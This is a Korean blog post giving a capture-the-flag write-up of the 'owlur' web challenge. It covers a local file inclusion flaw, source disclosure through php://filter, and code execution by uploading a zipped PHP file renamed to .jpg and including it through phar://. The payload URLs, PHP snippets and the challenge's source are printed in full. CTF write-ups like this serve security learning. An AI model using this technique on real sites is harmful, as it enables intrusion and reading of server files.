티스토리 뷰



 □ description

==========================================

http://54.65.205.135/owlur/


if you use a web scanner, your IP will get banned

no bruteforce required, take it easy

==========================================


http://54.64.81.174/owlur/


파일을 업로드할 수 있는 사이트가 있다.

Click here to view a random owl.

here 를 누르면 아래와 같이 부엉이(무작위)를 볼 수 있다.


http://54.64.81.174/owlur/index.php?page=view&id=random


page 파라미터에 view를 입력하면 위 그림과 같이 사진을 볼 수 있고, index를 입력하면 아래 그림과 같이 index 페이지를 볼 수 있다. 

page 파라미터를 통해서 PHP 파일들이 실행된다.

이를 통해서 index.php에 Local File Inclusion 취약점이 있다는 것을 알 수 있다.


http://54.64.81.174/owlur/index.php?page=index&id=random


PHP Wrappers 중에서 php://filter 를 이용해서 소스 코드를 확인할 수 있다.



view.php

http://54.64.81.174/owlur/index.php?page=php://filter/convert.base64-encode/resource=view


PD9waHAKJHBpYyA9ICRfUkVRVUVTVFsnaWQnXTsKCmlmKCRwaWMgPT0gIiIgfHwgJHBpYyA9PSAicmFuZG9tIikKewokcGljbmFtZSA9ICJwcmVsb2FkZWQtb3dscy8iIC4gcmFuZCgxLDE0KSAuICIuanBnIjsKfQoKZWxzZSAkcGljbmFtZSA9ICIvb3dsLyIgLiAkcGljIC4gIi5qcGciOwoKCgplY2hvICc8aW1nIHNyYz0iJyAuICRwaWNuYW1lIC4gJyI+JzsKCj8+Cg=


<?php
$pic = $_REQUEST['id'];
 
if($pic == "" || $pic == "random")
{
    $picname = "preloaded-owls/" . rand(1,14) . ".jpg";
}
 
else $picname = "/owl/" . $pic . ".jpg";
 
echo '<img src="' . $picname . '">';
 
?>
cs

upload.php

http://54.64.81.174/owlur/index.php?page=php://filter/convert.base64-encode/resource=upload


PD9waHAKCmZ1bmN0aW9uIFJhbmRvbVN0cmluZygpCnsKICAgICRjaGFyYWN0ZXJzID0gIjAxMjM0NTY3ODlhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ekFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaIjsKICAgICRyYW5kc3RyaW5nID0gIiI7CiAgICBmb3IgKCRpID0gMDsgJGkgPCA3OyAkaSsrKSB7CiAgICAgICAgJHJhbmRzdHJpbmcgLj0gJGNoYXJhY3RlcnNbcmFuZCgwLCBzdHJsZW4oJGNoYXJhY3RlcnMpLTEpXTsKICAgIH0KICAgIHJldHVybiAkcmFuZHN0cmluZzsKfQoKJHRhcmdldF9kaXIgPSAiL3Zhci93d3cvb3dsdXIvb3dsdXItdXBsb2FkLXp6enp6ei8iOwokdGFyZ2V0X2ZpbGUgPSAkdGFyZ2V0X2RpciAuIGJhc2VuYW1lKCRfRklMRVNbImZpbGVUb1VwbG9hZCJdWyJuYW1lIl0pOwokdXBsb2FkT2sgPSAwOwokaW1hZ2VGaWxlVHlwZSA9IHBhdGhpbmZvKCR0YXJnZXRfZmlsZSxQQVRISU5GT19FWFRFTlNJT04pOwokZnNpemUgPSAkX0ZJTEVTWydmaWxlVG9VcGxvYWQnXVsnc2l6ZSddOwokbmV3aWQgPSBSYW5kb21TdHJpbmcoKTsKJG5ld25hbWUgPSAkbmV3aWQgLiAiLmpwZyI7CgppZihpc3NldCgkX1BPU1RbInN1Ym1pdCJdKSkgewogICAgaWYoJGltYWdlRmlsZVR5cGUgPT0gImpwZyIpIHsKICAgICAgICAkdXBsb2FkT2sgPSAxOwogICAgfSBlbHNlIHsKCWVjaG8gIjxwPlNvcnJ5LCBvbmx5IEpQRyBpbWFnZXMgb2Ygb3dscyB3aWxsIGJlIGFjY2VwdGVkLiBQbGVhc2UgdXNlIGEgZGlmZmVyZW50IHNlcnZpY2UgaWYgeW91IGRvIG5vdCBpbnRlbmQgdG8gdXBsb2FkIG93bCBwaWN0dXJlcy48L3A+IjsKICAgICAgICAkdXBsb2FkT2sgPSAwOwogICAgfQoKICAgIGlmKCEoJGZzaXplID49IDAgJiYgJGZzaXplIDw9IDIwMDAwMCkpIHsKCSR1cGxvYWRPayA9IDA7CgkJZWNobyAiPHA+U29ycnksIHRoZSBzaXplIG9mIHlvdXIgb3dsIHBpY3R1cmUgaXMgbm90IHRvIG91ciBsaWtpbmcuPC9wPiI7Cgl9Cgp9CgppZigkdXBsb2FkT2spCnsKCiRuZXdwYXRoID0gIi92YXIvd3d3L293bHVyL293bHVyLXVwbG9hZC16enp6enovIiAuICRuZXduYW1lOwoKaWYgKG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJmaWxlVG9VcGxvYWQiXVsidG1wX25hbWUiXSwgJG5ld3BhdGgpKSB7CgloZWFkZXIoJ0xvY2F0aW9uOiAvb3dsdXIvaW5kZXgucGhwP3BhZ2U9dmlldyZpZD0nIC4gJG5ld2lkKTsKICAgIH0gZWxzZSB7CiAgICAgICAgZWNobyAiPHA+U29ycnksIHRoZXJlIHdhcyBhbiBlcnJvciB1cGxvYWRpbmcgeW91ciBmaWxlLjwvcD4iOwogICAgfQoKfQoKCj8+Cg==


<?php
 
function RandomString()
{
    $characters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $randstring = "";
    for ($i = 0$i < 7$i++) {
        $randstring .= $characters[rand(0, strlen($characters)-1)];
    }
    return $randstring;
}
 
$target_dir = "/var/www/owlur/owlur-upload-zzzzzz/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 0;
$imageFileType = pathinfo($target_file,PATHINFO_EXTENSION);
$fsize = $_FILES['fileToUpload']['size'];
$newid = RandomString();
$newname = $newid . ".jpg";
 
if(isset($_POST["submit"])) {
    if($imageFileType == "jpg") {
        $uploadOk = 1;
    } else {
    echo "<p>Sorry, only JPG images of owls will be accepted. Please use a different service if you do not intend to upload owl pictures.</p>";
        $uploadOk = 0;
    }
 
    if(!($fsize >= 0 && $fsize <= 200000)) {
    $uploadOk = 0;
        echo "<p>Sorry, the size of your owl picture is not to our liking.</p>";
    }
}
 
if($uploadOk)
{
 
$newpath = "/var/www/owlur/owlur-upload-zzzzzz/" . $newname;
 
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $newpath)) {
    header('Location: /owlur/index.php?page=view&id=' . $newid);
    } else {
        echo "<p>Sorry, there was an error uploading your file.</p>";
    }
}
 
?>
cs


파일을 업로드 해보면 아래와 같이 된다.

http://54.64.81.174/owlur/index.php?page=view&id=zfqvcDH


upload.php 소스 코드를 보면 파일 확장자에 대해서 .jpg 확인을 하지만, 파일 내용에 대해서는 확인하는 부분이 없다.


공격을 하기 위해서 phar:// 를 이용하였다.

phar:// — PHP Archive


d.php

<?php print_r(scandir('/'))?>


d.php 파일을 압축해준다.

압축된 d.php.zip 파일명을 d.jpg 로 변경해준다. 



d.jpg 파일을 업로드하면 아래와 같이 된다.

http://54.64.81.174/owlur/index.php?page=view&id=OoebY7U


변경된 파일명.jpg 파일을 phar:// 을 이용해서 압축을 풀어주고 d.php 파일을 실행한다.

http://54.64.81.174/owlur/index.php?page=phar:///var/www/owlur/owlur-upload-zzzzzz/OoebY7U.jpg/d


최상위 디렉터리에 OWLUR_FLAG.txt 파일을 볼 수 있다.

동일한 방법으로 해당 파일의 내용을 읽으면 된다.


o.php

<?php echo file_get_contents('/OWLUR-FLAG.txt')?>


o.php 파일을 압축해준다.

압축된 o.php.zip 파일명을 o.jpg 로 변경해준다. 


http://54.64.81.174/owlur/index.php?page=view&id=jnxL8Ja

http://54.64.81.174/owlur/index.php?page=phar:///var/www/owlur/owlur-upload-zzzzzz/jnxL8Ja.jpg/o



flag : PHP fILTerZ aR3 c00l buT i pr3f3r f1lt3r 0xc0ffee

 




<?php echo file_get_contents('/var/www/owlur/index.php')?>


<?php
$p = $_REQUEST['page'];
 
if($p == "" || $p == "index")
{
$p = "main";
}
 
$haq = base64_decode("ICAgICAgICAgICAgICAgICAgIC8tLS0tLS0tLS0KICAgICAgICAgICAgICAgICAgLyAvIC8qKioqKipcCiAgICAgICAgICAgICAgICAgLyAvKioqKi0tICogKlwKICAgICAgLy8oKCg6PDw8PC86KioqKioqKioqM1xYKlwoKDwKICAgICAvWFgvQ1hDJkNHRy8vKiovLS0vLy9YKlZcKiouLmcmCigvVkNDM2dnMC4uLi4uLi4uKi8vWC8vKC8vL1YqQ1wqLi44ODhnZzhnJjNDPAooMyZnRyYuLi4uLi4uLi4uLiouLlhYWC8oKCgvKi5cKi4uLi4uLi5HLzA4ODgzWDxgCi8oPEM4IC4uLi4uLi4uLi4uKi5YWFhYLy8vLzwvLi4qLi4uLi4uLi4uLi4uLi4uM0NeClgvLzw8Ly4uLi4uLi4uLi4uKiZDVlgvLy9WLzw8Ly4qLi4uLi4uLi4uLi4uLi4uOEdDPApYWC9DLzo8L1YuLi4uLi4uLiomM0NWWFZYVlgoPFYqKi4uLi4uLi4uLi4uLi4uLiBnOENeCiAgICBHQy88PC8oLi4uLi44RyYzQ0NWWFhYWFZ+WFYqLi4uLi4uLi4uLi4uLi4uIEM4M1YKICAgICAgIFYvPF48KFg4OCZWLy8oKDw8PDwoKDxePCoqLi4uLi4uLi4uLi4uLi4uWCYmQwogICAgICAgICAgICAgIGA6L0NDVi8oKCg8PCgvVlZWLyouLi4uLi4uLi4uLi4uLigvQyYvCiAgICAgICAgICAgICAgIDw8IF5eKC9WMzNWWC9WQyZYKlZDLi4uLjo8PH48PDwoKFggIGAKICAgICAgICAgICAgICAgVi8oLzwgXiBeXjovWC8oKDw8Xl4tLS1WOn5+PDwoCiAgICAgICAgICAgICAgMyYgICAgICAgICAgICAgICAgICAuXi0vCiAgICAgICAgICAgICAgQyAgL1wgICAgICAgL1wgICAgICAgIHwKICAgICAgICAgICAgIC9DICBcLyAgICAgICBcLyAgICAgICAvLwogUExaIFNUT1AgICAgIDMgICAgICAgICAgICAgICAgICAgIHxcCiAgIEhBQ0tJTkcgICAgQyAgICAgICAgICAgICAgICAgICAvNSoKICAgICAgICAgICAgICBWICAgICAvLS0tLS1cICAgICAgIC8KICAgICAgICAgICAgICBDRyAgfCAgICAgICAgIHwgIDwvLy88CiAgICAgICAgICAgICAgVkdWIHwgICAgICAgICB8IF4oL1g8XgogICAgICAgICAgICAgICAmJjwgIFwtLS0tLS8gIC4oKDwoXgogICAgICAgICAgICAgICAgODMoICAgICAgICAuPCh+YDw8CiAgICAgICAgICAgICAgICAgOFhgICAgICAuPDxeYCBgKCheCiAgICAgICAgICAgICAgICBCQEBDPC5gXl5gICAgICBeKENHJkMoPC5gYAogICAgIENHOEIkQEBAQEBAQEBAJCggICAgICAgICAgXl4oMEBAQEAkODNYPGAKICAgQkBAQEBAQEBAQEBAQEBAQEBAOC8gICAgICAgYDxDJEBAQEBAQEBAQEAkJjwKICBAQEBAQEBAQEBAQEBAQEAkJCRAQEAkJDA4ODhCQEBAQEBAQEBAQEBAQEBAQEBWYAogQEBAQEBAQEBAQEBAQEAkQCQkJCQkJCRAQEBAJCRAQEAkQEBAQEBAQEBAQEBAQEBDYApAQEBAQEBAQEBAQEBAQCRAJCQkJCQkJCQkJCQkJCQkJCQkQEBAQEBAQEBAQEBAQEBAKGAKQEBAQEBAQEBAQEAkQCQkJCQkJCQkJCQkJCQkQEAkJEBAQEBAQEBAQEBAQEBAQEBAQEIK");
$haq = htmlentities($haq);
 
if(strstr($p,".."!== FALSE)
die("<pre>$haq</pre>");
 
if(stristr($p,"http"!== FALSE)
die("<pre>$haq</pre>");
 
if(stristr($p,"ftp"!== FALSE)
die("<pre>$haq</pre>");
 
if(strlen($p>= 60)
die("<pre>string > 60
$haq</pre>");
 
$inc = sprintf("%s.php",$p);
 
?>
 
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Owlur - The simple image sharing website for owl pictures</title>
 
    <!-- Bootstrap -->
    <link href="css/bootstrap.min.css" rel="stylesheet">
 
    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
  </head>
  <body style="background-color: #d0d0c8;">
<center>
<h1>owlur</h1>
 
<?php
include($inc);
?>
 
</center>
    <!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
    <!-- Include all compiled plugins (below), or include individual files as needed -->
    <script src="js/bootstrap.min.js"></script>
  </body>
</html>
 
cs


                   /---------
                  / / /******\
                 / /****-- * *\
      //(((:<<<</:*********3\X*\((<
     /XX/CXC&CGG//**/--///X*V\**..g&
(/VCC3gg0........*//X//(///V*C\*..888gg8g&3C<
(3&gG&...........*..XXX/(((/*.\*.......G/08883X<`
/(<C8 ...........*.XXXX////</..*...............3C^
X//<</...........*&CVX///V/<</.*...............8GC<
XX/C/:</V........*&3CVXVXVX(<V**............... g8C^
    GC/<</(.....8G&3CCVXXXXV~XV*............... C83V
       V/<^<(X88&V//((<<<<((<^<**...............X&&C
              `:/CCV/(((<<(/VVV/*..............(/C&/
               << ^^(/V33VX/VC&X*VC....:<<~<<<((X  `
               V/(/< ^ ^^:/X/((<<^^---V:~~<<(
              3&                  .^-/
              C  /\       /\        |
             /C  \/       \/       //
 PLZ STOP     3                    |\
   HACKING    C                   /5*
              V     /-----\       /
              CG  |         |  <///<
              VGV |         | ^(/X<^
               &&<  \-----/  .((<(^
                83(        .<(~`<<
                 8X`     .<<^` `((^
                B@@C<.`^^`     ^(CG&C(<.``
     CG8B$@@@@@@@@@$(          ^^(0@@@@$83X<`
   B@@@@@@@@@@@@@@@@@8/       `<C$@@@@@@@@@@$&<
  @@@@@@@@@@@@@@@$$$@@@$$0888B@@@@@@@@@@@@@@@@@V`
 @@@@@@@@@@@@@@$@$$$$$$$@@@@$$@@@$@@@@@@@@@@@@@@C`
@@@@@@@@@@@@@@$@$$$$$$$$$$$$$$$$$$@@@@@@@@@@@@@@@(`
@@@@@@@@@@@$@$$$$$$$$$$$$$$@@$$@@@@@@@@@@@@@@@@@@B
 
cs



'CTF (Git으로 이사 예정)' 카테고리의 다른 글

[SSCTF] Up!Up!Up! - Web (100)  (0) 2016.03.01
[SharifCTF] technews - Web (200)  (0) 2016.02.09
[SharifCTF] PhotoBlog - Web (100)  (0) 2016.02.09
[32C3] ITD - Web (150)  (0) 2016.01.19
[32C3] Sequence Hunt - Web (200)  (0) 2016.01.13
[32C3] Kummerkasten - Web (300)  (0) 2016.01.12
[32C3] TinyHosting - Web (250)  (0) 2016.01.11
[32C3] MonkeyBase - Web (200)  (0) 2016.01.07
[32C3] forth - Pwn (150)  (0) 2016.01.03
[CODEGATE2015] Owltube - Web (400 Point)  (0) 2015.03.16
댓글
«   2024/12   »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31
링크
공지사항
Total
Today
Yesterday